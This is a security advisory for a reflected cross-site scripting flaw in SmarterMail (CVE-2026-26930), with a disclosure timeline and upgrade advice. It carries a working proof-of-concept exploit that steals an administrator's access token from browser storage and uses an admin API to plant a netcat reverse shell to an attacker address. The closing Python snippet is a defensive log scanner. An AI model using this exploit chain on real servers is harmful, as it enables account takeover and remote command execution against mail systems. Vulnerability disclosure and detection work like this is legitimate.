CVSS v3.1 base score: 7.2 / 10 (HIGH)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
Description: SmarterMail versions 9518 and below have an issue where user input passed through the MailboxId GET parameter to the MAPI endpoints is not properly sanitized before being used to generate HTML output. This can be exploited by attackers to perform...
ID: PACKETSTORM:215790
Published: Feb 17, 2026 at 00:00
----------------------------------------------------------------------------
SmarterMail <= 9518 (MailboxId) Reflected Cross-Site Scripting Vulnerability
----------------------------------------------------------------------------
[-] Software Link:
https://www.smartertools.com/smartermail/business-email-server
[-] Affected Versions:
Build 9518 and prior builds.
[-] Vulnerability Description:
User input passed through the "MailboxId" GET parameter to the MAPI
endpoints is not properly sanitized before being used to generate HTML
output. This can be exploited by attackers to perform Reflected Cross-Site
Scripting (XSS) attacks which, in turn, might lead to 1-click Remote
Command Execution (RCE) attacks.
[-] Proof of Concept:
https://karmainsecurity.com/pocs/CVE-2026-26930.html
[-] Solution:
Upgrade to build 9526 or later.
[-] Disclosure Timeline:
[26/01/2026] - Vendor notified
[26/01/2026] - Vendor response stating "we will get this over to the
developers for evaluation"
[30/01/2026] - Vendor released build 9526
[03/02/2026] - CVE identifier requested
[16/02/2026] - CVE identifier assigned
[16/02/2026] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.org) has assigned the
name CVE-2026-26930 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-04
--- packet storm attached poc: ---
<!--
----------------------------------------------------------------------------
SmarterMail <= 9518 (MailboxId) Reflected Cross-Site Scripting Vulnerability
----------------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://www.smartertools.com/smartermail/business-email-server
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-04
-->
<script>
    const VICTIM_URL = "http://smartermail";
    const XSS = `<script>
        const ATTACKER_IP = "192.168.1.23";
        const ATTACKER_PORT = "4444";
        fetch("` + VICTIM_URL + `/api/v1/settings/sysadmin/AddOrUpdateMount", {
            method: "POST",
            headers: {
                "Content-Type": "application/json",
                "Authorization": "Bearer " + Object.values(JSON.parse(localStorage.userTokens))[0].accessToken
            },
            body: JSON.stringify({
                CommandMount: "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc " + ATTACKER_IP + " " + ATTACKER_PORT + " > /tmp/f",
                MountPath: "RCE"
            })
        });
    <\/script>`;
    location.href = VICTIM_URL + "/mapi/nspi?MailboxId=" + encodeURIComponent(btoa(XSS));
</script>
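A triage check for the pattern the advisory and its PoC describe: a request to a /mapi/ endpoint whose MailboxId value, either as sent or after base64 decoding, contains HTML markup. This is an added example written for this page, not code from the advisory or from SmarterTools; it assumes combined-format access logs and the /mapi/nspi path shown in the PoC, and the sample log lines are constructed.

```python
import base64
import re
from urllib.parse import parse_qs, quote, urlsplit

# Markup the MAPI endpoint would reflect into HTML (tag, space-separated inline
# event handler, javascript: URL). A triage heuristic, not an HTML parser.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|\son[a-z]+\s*=|javascript:", re.I)
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def decode_candidates(value):
    """Yield the raw MailboxId value and, if it is valid base64, its decoding."""
    yield value
    try:
        padded = value + "=" * (-len(value) % 4)
        yield base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return

def scan_line(line):
    """Return (path, payload) for a /mapi/ request whose MailboxId carries markup."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    parts = urlsplit(match.group("target"))
    if not parts.path.lower().startswith("/mapi/"):
        return None
    query = parse_qs(parts.query)  # parameter names are matched case-insensitively
    for value in [v for k, vs in query.items() if k.lower() == "mailboxid" for v in vs]:
        for candidate in decode_candidates(value):
            if MARKUP_RE.search(candidate):
                return parts.path, candidate
    return None

def scan_log(text):
    return [hit for hit in map(scan_line, text.splitlines()) if hit]

def _b64param(s):
    # URL-encoded base64, the shape the advisory's PoC gives MailboxId.
    return quote(base64.b64encode(s.encode()).decode())

# Constructed sample lines in combined log format; not real SmarterMail traffic.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [16/Feb/2026:10:01:02 +0000] "GET /mapi/nspi?MailboxId='
    + _b64param("user@example.com") + ' HTTP/1.1" 200 512',
    '10.0.0.9 - - [16/Feb/2026:10:01:07 +0000] "GET /mapi/nspi?MailboxId='
    + _b64param("<script>alert(1)</script>") + ' HTTP/1.1" 200 512',
    '10.0.0.9 - - [16/Feb/2026:10:01:09 +0000] "GET /mapi/nspi?MailboxId='
    + quote("<img src=x onerror=alert(1)>") + ' HTTP/1.1" 200 512',
    '10.0.0.7 - - [16/Feb/2026:10:02:00 +0000] "GET /interface/root HTTP/1.1" 200 4096',
])
```

A plain mailbox identifier decodes to harmless text and is not reported, while a base64-wrapped script tag and an unencoded event-handler payload both surface; the regex is deliberately loose, so treat hits as leads for review rather than confirmed exploitation.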